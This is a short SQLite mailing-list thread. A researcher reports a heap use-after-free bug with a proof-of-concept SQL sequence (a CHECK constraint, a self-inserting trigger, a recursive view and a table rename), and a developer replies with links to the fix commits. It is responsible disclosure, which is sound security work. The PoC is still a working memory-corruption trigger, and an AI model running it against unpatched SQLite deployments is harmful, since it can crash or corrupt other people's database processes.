On 28/12/62 01:58, Yongheng Chen wrote:
Hi,
We found a heap UAF bug in sqlite. Here’s the PoC:
—
CREATE TABLE v0 ( v1 CHECK( CASE v1 WHEN '13' THEN 10 ELSE 10 END ) ) ; CREATE
TRIGGER x INSERT ON v0 BEGIN INSERT INTO v0 ( v1 , v1 ) SELECT v1 , v1 FROM v0
WHERE v1 < 10 ON CONFLICT DO NOTHING ; END ; INSERT INTO v0 SELECT * FROM v0
WHERE v1 OR 0 ; CREATE VIEW v2 ( v3 ) AS WITH x1 AS ( SELECT * FROM v2 ) SELECT v3
AS x , v3 AS y FROM v2 ; ALTER TABLE zipfile RENAME TO t3 ;
—
This bug exists in both release code and development code. It triggers uaf with
asan with release code while triggering an assert in the delevelopment code.
Thanks for this. Looks like the asan error was fixed here:
https://www.sqlite.org/src/info/de6e6d6846d6a41c
The assert() failure is now fixed here:
https://www.sqlite.org/src/info/d29edef93451cc67
Dan.
Yongheng & Rui
_______________________________________________
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users
_______________________________________________
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users